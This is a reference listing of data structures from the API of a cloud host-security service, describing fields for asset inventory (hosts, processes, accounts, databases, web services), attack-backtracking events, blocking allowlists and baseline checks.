Grayscale project configuration
Used by actions: DescribeABTestConfig.
Name | Type | Description |
---|---|---|
ProjectName | String | Grayscale project name |
Status | Boolean | true: grayscale release in progress; false: grayscale release not in progress. |
Account statistics data
Used by actions: DescribeAccountStatistics.
Name | Type | Description |
---|---|---|
Username | String | Username |
MachineNum | Integer | Number of hosts |
Information on alarms associated with the node
Used by actions: DescribeVertexDetail.
Name | Type | Description |
---|---|---|
AlarmId | String | Table names and IDs of the alarms associated with the node, as table:ID pairs. Separate multiple pairs with commas. Example: t1:id1,t2:id2 |
Status | Integer | Alarm status. This parameter takes effect when this node is an alarm node. |
Basic information on the resource management process
Used by actions: DescribeAssetAppList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineName | String | Host name |
MachineWanIp | String | Host public IP address |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Application name |
Type | Integer | Application type. 1: operations; 2: database; 3: security; 4: suspicious application; 5: system architecture; 6: system application; 7: web service; 99: other |
BinPath | String | Binary path |
OsInfo | String | Operating System Information |
ProcessCount | Integer | Number of associated processes |
Desc | String | Application description |
Version | String | Version No. |
ConfigPath | String | Configuration file path |
FirstTime | String | First collection time |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
IsNew | Integer | Whether the web service is newly added [0: no; 1: yes] Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Software application-related process information
Used by actions: DescribeAssetAppProcessList, DescribeAssetJarInfo, DescribeAssetWebServiceProcessList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Status | String | Process status |
Version | String | Process version |
Path | String | Path |
User | String | User |
StartTime | String | Startup time |
List of information on the asset management kernel module
Used by actions: DescribeAssetCoreModuleList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Desc | String | Description |
Path | String | Path |
Version | String | Version |
MachineIp | String | Server IP |
MachineName | String | Server name |
OsInfo | String | Operating system |
Size | Integer | Module size |
ProcessCount | Integer | Number of dependent processes |
ModuleCount | Integer | Number of dependent modules |
Id | String | Module ID |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no; 1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Details of the asset management kernel module
Used by actions: DescribeAssetCoreModuleInfo.
Name | Type | Description |
---|---|---|
Name | String | Name |
Desc | String | Description |
Path | String | Path |
Version | String | Version |
Size | Integer | Size |
Processes | String | Dependent processes |
Modules | String | Dependent modules |
Params | Array of AssetCoreModuleParam | Parameter information Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Parameters of the asset management kernel module
Used by actions: DescribeAssetCoreModuleInfo.
Name | Type | Description |
---|---|---|
Name | String | Name |
Data | String | Data |
Resource management database list information
Used by actions: DescribeAssetDatabaseList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Database name |
Version | String | Version |
Port | String | Listening port |
Proto | String | Protocol |
User | String | Running user |
Ip | String | Bound IP |
ConfigPath | String | Configuration file path |
LogPath | String | Log file path |
DataPath | String | Data path |
Permission | String | Running permission |
ErrorLogPath | String | Error log path |
PlugInPath | String | Plugin path |
BinPath | String | Binary path |
Param | String | Startup parameter |
Id | String | Database ID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no; 1: yes] |
MachineName | String | Host name |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Resource management database list information
Used by actions: DescribeAssetDatabaseInfo.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
Name | String | Database name |
Version | String | Version |
Port | String | Listening port |
Proto | String | Protocol |
User | String | Running user |
Ip | String | Bind IP |
ConfigPath | String | Configuration file path |
LogPath | String | Log file path |
DataPath | String | Data path |
Permission | String | Running permission |
ErrorLogPath | String | Error log path |
PlugInPath | String | Plugin path |
BinPath | String | Binary path |
Param | String | Startup parameter |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Asset management disk partition information
Used by actions: DescribeAssetDiskList, DescribeAssetMachineDetail.
Name | Type | Description |
---|---|---|
Name | String | Partition name |
Size | Integer | Partition size (unit: G) |
Percent | Float | Partition utilization |
Type | String | File system type |
Path | String | Mounting directory |
Used | Integer | Used space (unit: G) |
List of asset management environment variables
Used by actions: DescribeAssetEnvList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type. 0: user variable; 1: system variable |
User | String | Startup user |
Value | String | Environment variable value |
MachineIp | String | Server IP |
MachineName | String | Server name |
OsInfo | String | Operating system |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no; 1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Container security
Key-value pair filter used for conditional filtering queries, for example filtering by ID, name, or status.
If there are multiple Filters, the logical relationship between them is AND.
If there are multiple Values in the same Filter, the logical relationship between the Values under the same Filter is OR.
Used by actions: DescribeAssetAppList, DescribeAssetCoreModuleList, DescribeAssetDatabaseList, DescribeAssetEnvList, DescribeAssetInitServiceList, DescribeAssetJarList, DescribeAssetPlanTaskList, DescribeAssetWebServiceInfoList, DescribeLoginWhiteHostList, ExportAssetAppList, ExportAssetCoreModuleList, ExportAssetDatabaseList, ExportAssetEnvList, ExportAssetInitServiceList, ExportAssetJarList, ExportAssetPlanTaskList, ExportAssetWebServiceInfoList.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name of filter key |
Values | Array of String | Yes | One or more filter values |
ExactMatch | Boolean | No | Whether to use fuzzy query |
List of asset management startup services
Used by actions: DescribeAssetInitServiceList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type. 1: Encoder; 2: IE plugin; 3: Network provider; 4: Mirror hijacking; 5: LSA provider; 6: KnownDLLs; 7: Start execution; 8: WMI; 9: Scheduled task; 10: Winsock provider; 11: Print monitor; 12: Resource manager; 13: Driver service; 14: Log-in |
Status | Integer | Default enabling status: 0 - disabled; 1 - enabled |
User | String | Startup user |
Path | String | Path |
MachineIp | String | Server IP |
MachineName | String | Name |
OsInfo | String | Operating system |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no; 1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
IsAutoRun | Integer | Start at boot [0: No; 1: Yes] |
List of asset management JAR packages
Used by actions: DescribeAssetJarList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type. 1: application; 2: system class library; 3: web service built-in library; 8: others. |
Status | Integer | Whether it is executable. 0: unknown; 1: yes; 2: no. |
Version | String | Version |
Path | String | Path |
MachineIp | String | Server IP address |
MachineName | String | Server name |
OsInfo | String | Operating system |
Id | String | JAR package ID |
Md5 | String | JAR package Md5 |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether it is newly added [0: no; 1: yes] |
MachineWanIp | String | Server public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Asset management jar package details
Used by actions: DescribeAssetJarInfo.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type: 1: application; 2: system library; 3: Web service built-in library; 8: other |
Status | Integer | Whether executable: 0: unknown; 1: yes; 2: no |
Version | String | Version |
Path | String | Path |
MachineIp | String | Server IP |
MachineName | String | Server name |
OsInfo | String | Operating system |
Process | Array of AssetAppProcessInfo | Reference process list Note: This field may return null, indicating that no valid values can be obtained. |
Md5 | String | Jar package Md5 Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Generic data structure of Key-val type
Used by actions: DescribeAssetAppCount, DescribeAssetDatabaseCount, DescribeAssetHostTotalCount, DescribeAssetMachineTagTop, DescribeAssetPortCount, DescribeAssetProcessCount, DescribeAssetRecentMachineInfo, DescribeAssetTotalCount, DescribeAssetTypeTop, DescribeAssetUserCount, DescribeAssetWebAppCount, DescribeAssetWebFrameCount, DescribeAssetWebLocationCount, DescribeAssetWebServiceCount.
Name | Type | Description |
---|---|---|
Key | String | Tag |
Value | Integer | Quantity |
Desc | String | Description information Note: This field may return null, indicating that no valid values can be obtained. |
NewCount | Integer | Number of additions today Note: This field may return null, indicating that no valid values can be obtained. |
Asset management load information
Used by actions: DescribeAssetLoadInfo.
Name | Type | Description |
---|---|---|
MachineName | String | Host name |
Desc | String | Description |
Value | Float | Load |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
Resource load overview
Used by actions: DescribeAssetLoadInfo.
Name | Type | Description |
---|---|---|
Counts | Array of Integer | Load amount array, in ascending order: [0% or unknown quantity, 0%~20%, 20%~50%, 50%~80%, 80%~100%] |
Top5 | Array of AssetLoadDetail | Top 5 Load Note: This field may return null, indicating that no valid values can be obtained. |
Basic information on the server list in asset fingerprint
Used by actions: DescribeAssetMachineList.
Name | Type | Description |
---|---|---|
Quuid | String | Server QUUID |
Uuid | String | Server UUID |
MachineIp | String | Private IP address of server |
MachineName | String | Server name |
OsInfo | String | Operating system name |
Cpu | String | CPU information |
MemSize | Integer | Memory capacity, in GB |
MemLoad | String | Memory utilization, in percentage |
DiskSize | Integer | Hard disk capacity, in GB |
DiskLoad | String | Hard disk utilization, in percentage |
PartitionCount | Integer | Number of partitions |
MachineWanIp | String | Host public IP address |
ProjectId | Integer | Business group ID |
CpuSize | Integer | CPU count |
CpuLoad | String | CPU utilization, in percentage |
Tag | Array of MachineTag | Tag Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
IsNew | Integer | Whether it is newly added [0 - no; 1 - yes] |
FirstTime | String | First collection time |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
CpuLoadNum | String | CPU load readings (only valid for Linux systems) Note: This field may return null, indicating that no valid values can be obtained. |
Basic information on the server list in asset fingerprint
Used by actions: DescribeAssetMachineDetail.
Name | Type | Description |
---|---|---|
Quuid | String | Server QUUID |
Uuid | String | Server UUID |
MachineIp | String | Private IP address of server |
MachineName | String | Server name |
OsInfo | String | Operating system name |
Cpu | String | CPU information |
MemSize | Integer | Memory capacity, in GB |
MemLoad | String | Memory utilization, in percentage |
DiskSize | Integer | Hard disk capacity, in GB |
DiskLoad | String | Hard disk usage, in percentage |
PartitionCount | Integer | Number of partitions |
MachineWanIp | String | Host public IP address |
CpuSize | Integer | Number of CPU |
CpuLoad | String | CPU load |
ProtectLevel | Integer | Protection Level. 0 Basic Edition; 1 Professional Edition; 2 Premium Edition; 3 General Discount Edition |
RiskStatus | String | Risk status: UNKNOW - unknown; RISK - risky; SAFT - Safe |
ProtectDays | Integer | Days protected |
BuyTime | String | Professional edition activation time |
EndTime | String | Professional edition expiration time |
CoreVersion | String | Kernel version |
OsType | String | linux/windows |
AgentVersion | String | Agent version |
InstallTime | String | Installation time |
BootTime | String | System startup time |
LastLiveTime | String | Last online time |
Producer | String | Manufacturer |
SerialNumber | String | Serial number |
NetCards | Array of AssetNetworkCardInfo | Network interface |
Disks | Array of AssetDiskPartitionInfo | Partition |
Status | Integer | 0: online; 1: offline |
ProjectId | Integer | Business group ID |
DeviceVersion | String | Server model |
OfflineTime | String | Offline time Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Host ID Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
CpuLoadVul | String | CpuLoadVul Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | Time Note: This field may return null, indicating that no valid values can be obtained. |
Asset management network interface information
Used by actions: DescribeAssetMachineDetail.
Name | Type | Description |
---|---|---|
Name | String | Network interface name |
Ip | String | IPv4 address |
GateWay | String | Gateway |
Mac | String | MAC address |
Ipv6 | String | IPv6 address |
DnsServer | String | DNS server |
List of asset management plan tasks
Used by actions: DescribeAssetPlanTaskList.
Name | Type | Description |
---|---|---|
Status | Integer | Default enabling status. 1 - enabled; 2 - not enabled |
Cycle | String | Execution cycle |
Command | String | Execute command or script |
User | String | Startup user |
ConfigPath | String | Configuration file path |
MachineIp | String | Server IP |
MachineName | String | Name |
OsInfo | String | Operating system |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no; 1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Basic information of resource management account
Used by actions: DescribeAssetPortInfoList.
Name | Type | Description |
---|---|---|
MachineIp | String | Private IP address of the host |
MachineWanIp | String | Public IP address of the host |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
ProcessName | String | Process name |
ProcessVersion | String | Process version |
ProcessPath | String | Process path |
Pid | String | Process ID |
User | String | Running user |
StartTime | String | Start time |
Param | String | Start parameter |
Teletype | String | Process TTY |
Port | String | Port |
GroupName | String | User group |
Md5 | String | Process MD5 |
Ppid | String | Parent process ID |
ParentProcessName | String | Parent process name |
Proto | String | Port protocol |
BindIp | String | Bound IP |
MachineName | String | Host name |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no; 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Basic information on the resource management process
Used by actions: DescribeAssetProcessInfoList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Process name |
Desc | String | Process description |
Path | String | Process path |
Pid | String | Process ID |
User | String | Running user |
StartTime | String | Startup time |
Param | String | Startup parameter |
Tty | String | Process TTY |
Version | String | Process version |
GroupName | String | Process user group |
Md5 | String | Process MD5 |
Ppid | String | Parent process ID |
ParentProcessName | String | Parent process name |
Status | String | Process status |
HasSign | Integer | Digital signature. 0: no; 1: yes; 999: null (Windows only). |
InstallByPackage | Integer | Whether installed by a package. 0: no; 1: yes; 999: null (Linux only). |
PackageName | String | Software package name |
MachineName | String | Host name |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no; 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Information on resource management system installation package list
Used by actions: DescribeAssetSystemPackageList.
Name | Type | Description |
---|---|---|
Name | String | Database name |
Desc | String | Description |
Version | String | Version |
InstallTime | String | Installation time |
Type | String | Type |
MachineName | String | Host name |
MachineIp | String | Host IP |
OsInfo | String | Operating system |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no; 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information |
Quuid | String | Host ID |
Uuid | String | Agent Id |
Asset fingerprint type description
Used by actions: DescribeAssetTypes.
Name | Type | Description |
---|---|---|
Id | Integer | Type ID |
Name | String | Type name |
Resource management account basic information
Used by actions: DescribeAssetUserList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
MachineName | String | Host name |
OsInfo | String | Operating System Information |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
Uid | String | Account UID |
Gid | String | Account GID |
Status | Integer | Account status. 0: disabled; 1: enabled |
IsRoot | Integer | Whether there is root permission. 0: no; 1: yes; 999: null (Linux only) |
LoginType | Integer | Log-in method. 0: log-in not allowed; 1: only key-based log-in allowed; 2: only password-based log-in allowed; 3: both key-based log-in and password-based log-in allowed; 999: null (Linux only) |
LastLoginTime | String | Last log-in time |
Name | String | Account name |
ProjectId | Integer | Host business group ID |
UserType | Integer | Account type. 0: guest user; 1: standard user; 2: administrator user; 999: null (Windows only) |
IsDomain | Integer | Whether a domain account. 0: no; 1: yes; 2: no; 999: null (Windows only) |
IsSudo | Integer | Whether the account has sudo permissions. 1: yes; 0: no; 999: null (Linux only) |
IsSshLogin | Integer | Whether ssh log-in allowed. 1: yes; 0: no; 999: null (Linux only) |
HomePath | String | Home directory |
Shell | String | Shell path (Linux only) |
ShellLoginStatus | Integer | Whether shell log-in allowed. 0: no; 1: yes (Linux only) |
PasswordChangeTime | String | Password modification time |
PasswordDueTime | String | Password expiration time (Linux only) |
PasswordLockDays | Integer | Password locking time (unit: day): -1 - never locked; 999 - null (Linux only) |
PasswordStatus | Integer | Password status: 1 - normal; 2 - expiring soon; 3 - expired; 4 - locked; 999 - null (Linux only) |
UpdateTime | String | Update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no; 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Basic information for resource management account
Used by actions: DescribeAssetUserInfo.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineName | String | Host name |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
Uid | String | Account UID |
Gid | String | Account GID |
Status | Integer | Account status. 0: disabled; 1: enabled. |
IsRoot | Integer | Whether there is root permission. 0: no; 1: yes; 999: null (Linux only). |
LastLoginTime | String | Last log-in time |
Name | String | Account name |
UserType | Integer | Account type. 0: guest user; 1: standard user; 2: administrator user; 999: null (Windows only). |
IsDomain | Integer | Whether the account is a domain account. 0: no; 1: yes; 999: null (Windows only). |
IsSshLogin | Integer | Whether SSH log-in allowed. 1: yes; 0: no; 999: null (Linux only). |
HomePath | String | Home directory |
Shell | String | Shell path (Linux only) |
ShellLoginStatus | Integer | Whether shell log-in allowed. 0: no; 1: yes (Linux only). |
PasswordChangeTime | String | Password modification time |
PasswordDueTime | String | Password expiration time (Linux only) |
PasswordLockDays | Integer | Password locking time (unit: day). -1: never locked; 999: null (Linux only). |
Remark | String | Remarks |
GroupName | String | User group name |
DisableTime | String | Account expiration time |
LastLoginTerminal | String | Last log-in terminal |
LastLoginLoc | String | Last log-in location |
LastLoginIp | String | Last log-in IP address |
PasswordWarnDays | Integer | Password expiration reminder, in days |
PasswordChangeType | Integer | Password change settings. 0: not allowed; 1: allowed. |
Keys | Array of AssetUserKeyInfo | User public key list Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Details of the asset management account key
Used by actions: DescribeAssetUserInfo, DescribeAssetUserKeyList.
Name | Type | Description |
---|---|---|
Value | String | Public key value |
Comment | String | Public key remarks |
EncryptType | String | Encryption method |
List of the information on the resource management web application
Used by actions: DescribeAssetWebAppList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating system information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Application name |
Version | String | Version |
RootPath | String | Root path |
ServiceType | String | Service type |
Domain | String | Site domain name |
VirtualPath | String | Virtual path |
PluginCount | Integer | Number of plugins |
Id | String | Application ID |
Desc | String | Application description |
MachineName | String | Host name |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether it is newly added [0: no; 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Details of web application plugin for asset management
Used by actions: DescribeAssetWebAppPluginList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Desc | String | Description |
Version | String | Version |
Link | String | Link |
Resource management Web application list information
Used by actions: DescribeAssetWebFrameList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Database name |
Version | String | Version |
Lang | String | Language |
ServiceType | String | Service type |
MachineName | String | Host name |
UpdateTime | String | Data update time |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no; 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Path | String | Application path |
Asset management Web site list information
Used by actions: DescribeAssetWebLocationList.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineIp | String | Private IP address |
MachineWanIp | String | Public IP address |
MachineName | String | Host name |
OsInfo | String | Operating system |
Name | String | Domain name |
Port | String | Site port |
Proto | String | Site protocol |
ServiceType | String | Service type |
PathCount | Integer | Number of site paths |
User | String | Running user |
MainPath | String | Home directory |
MainPathOwner | String | Home directory owner |
Permission | String | Owner permissions |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag |
Id | String | Web site ID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether the web service is newly added [0 - no; 1 - yes] Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Asset management Web site list information
Used by actions: DescribeAssetWebLocationInfo.
Name | Type | Description |
---|---|---|
Name | String | Domain name |
Port | String | Site port |
Proto | String | Site protocol |
ServiceType | String | Service type |
SafeStatus | Integer | Security module status. 0: not enabled; 1: enabled; 999: null (nginx only) |
User | String | Running user |
MainPath | String | Home directory |
Command | String | Startup command |
Ip | String | Bind IP |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Virtual directory of the asset management web site
Used by actions: DescribeAssetWebLocationPathList.
Name | Type | Description |
---|---|---|
VirtualPath | String | Virtual path |
RealPath | String | Physical path |
User | String | File owner |
Group | String | File group |
Permission | String | File permission |
List information on resource management Web service
Used by actions: DescribeAssetWebServiceInfoList.
Name | Type | Description |
---|---|---|
MachineIp | String | Private IP address of a host |
MachineWanIp | String | Public IP address of a host |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Database name |
Version | String | Version |
BinPath | String | Binary path |
User | String | Startup user |
InstallPath | String | Installation path |
ConfigPath | String | Configuration path |
ProcessCount | Integer | Number of associated processes |
Id | String | Web Service ID |
MachineName | String | Host name |
Desc | String | Description |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no|1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Attack backtracking
Used by actions: DescribeAttackSource.
Name | Type | Description |
---|---|---|
Nodes | Array of AttackSourceNode | Attack backtracking node description Note: This field may return null, indicating that no valid values can be obtained. |
Edges | Array of AttackSourceEdge | Attack backtracking node path Note: This field may return null, indicating that no valid values can be obtained. |
EventInfoParam | String | Parameters for requesting details on node-related events Note: This field may return null, indicating that no valid values can be obtained. |
Attack backtracking path description
Used by actions: DescribeAttackSource.
Name | Type | Description |
---|---|---|
From | String | Starting node |
To | String | Target node |
Attack backtracking event
Used by actions: DescribeAttackSourceEvents.
Name | Type | Description |
---|---|---|
EventType | Integer | Event type. 0: virus scanning; 1: abnormal log-in; 2: password cracking; 3: malicious request; 4: high-risk command. |
Content | String | [Virus scanning] Virus name: VirusName, file name: FileName, file path: FilePath, file size: FileSize, file MD5: MD5, first detection time: CreateTime, last detection time: LatestScanTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [Abnormal log-in] Source IP: SrcIp, location: Location, log-in username: UserName, log-in time: LoginTime [Password cracking] Source IP: SrcIp, location: City and Country, protocol: Protocol, log-in username: UserName, port: Port, attempt count: Count, first attack time: CreateTime, last attack time: ModifyTime [Malicious request] Malicious request domain name: Url, process: ProcessName, MD5: ProcessMd5, PID: Pid, request count: AccessCount, last request time: MergeTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [High-risk command] Hit rule name: RuleName, rule category: RuleCategory, command content: BashCmd, data source: DetectBy, Log-in user: User, PID: Pid, occurrence time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme |
CreatedTime | String | Intrusion time |
Level | Integer | Unified event risk level. 0: prompt; 1: low; 2: medium; 3: high; 4: critical. |
LevelZh | String | Risk level string in Chinese |
Id | Integer | Event ID |
Uuid | String | Host UUID |
Attack backtracking node
Used by actions: DescribeAttackSource.
Name | Type | Description |
---|---|---|
EventId | Integer | Event ID. If this parameter is left blank, no corresponding event exists. |
EventType | String | BRUTEFORCE: password cracking; MALWARE: Trojan; BASH: high-risk command; RISK_DNS: malicious request; LOGIN: cross-region log-in; HOST: host node; TIME_ORDER: general node. |
Ip | String | Node IP address. When the node is HOST, the value is the IP address of this node. |
Level | Integer | Level. 0: prompt; 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical. |
NodeId | String | Node ID |
StartTime | String | Start time |
EndTime | String | End time |
NodeDesc | String | General node description |
TimeLineNum | Integer | Timeline number. Nodes with the same number belong to the same timeline. |
NodeDetail | String | Node details |
Block allowlist rules
Used by actions: CreateBanWhiteList, ModifyBanWhiteList.
Name | Type | Required | Description |
---|---|---|---|
Id | String | No | Allowlist IDs |
Remark | String | No | Allowlist aliases |
SrcIp | String | No | Block source IP |
ModifyTime | Timestamp | No | Time of modifying allowlists |
CreateTime | Timestamp | No | Time of creating allowlists |
Uuid | String | No | Machine associated with the allowlist Note: This field may return null, indicating that no valid values can be obtained. |
IsGlobal | Boolean | No | Whether the allowlist is global Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | Array of String | No | Machine list associated with the allowlist Note: This field may return null, indicating that no valid values can be obtained. |
List of displayed blocking allowlist information, including the machine information
Used by actions: DescribeBanWhiteList.
Name | Type | Description |
---|---|---|
Id | String | Allowlist ID |
Remark | String | Allowlist alias |
SrcIp | String | Blocking source IP address |
ModifyTime | Timestamp | Allowlist modification time |
CreateTime | Timestamp | Allowlist creation time |
IsGlobal | Boolean | Whether the allowlist takes effect globally |
Quuid | String | Machine UUID |
Uuid | String | CWPP program UUID |
MachineIp | String | Machine IP address |
MachineName | String | Machine name |
Basic baseline information
Used by actions: DescribeBaselineBasicInfo.
Name | Type | Description |
---|---|---|
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
BaselineId | Integer | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
ParentId | Integer | Parent ID Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Custom Rule ID and Name
Used by actions: DescribeIgnoreHostAndItemConfig.
Name | Type | Description |
---|---|---|
RuleId | Integer | Custom rule ID Note: This field may return null, indicating that no valid values can be obtained. |
RuleName | String | Custom Rule Name Note: This field may return null, indicating that no valid values can be obtained. |
Baseline details
Used by actions: DescribeBaselineDetail.
Name | Type | Description |
---|---|---|
Description | String | Baseline description Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Severity level Note: This field may return null, indicating that no valid values can be obtained. |
PackageName | String | Package name Note: This field may return null, indicating that no valid values can be obtained. |
ParentId | Integer | Parent ID Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
Baseline check parameters
Used by actions: StartBaselineDetect.
Name | Type | Required | Description |
---|---|---|---|
PolicyIds | Array of Integer | No | Collection of check policies |
RuleIds | Array of Integer | No | Collection of check rules |
ItemIds | Array of Integer | No | Collection of check items |
HostIds | Array of String | No | Collection of checked server IDs |
Information on the host affected by baseline
Used by actions: DescribeBaselineEffectHostList.
Name | Type | Description |
---|---|---|
PassCount | Integer | Passed item Note: This field may return null, indicating that no valid values can be obtained. |
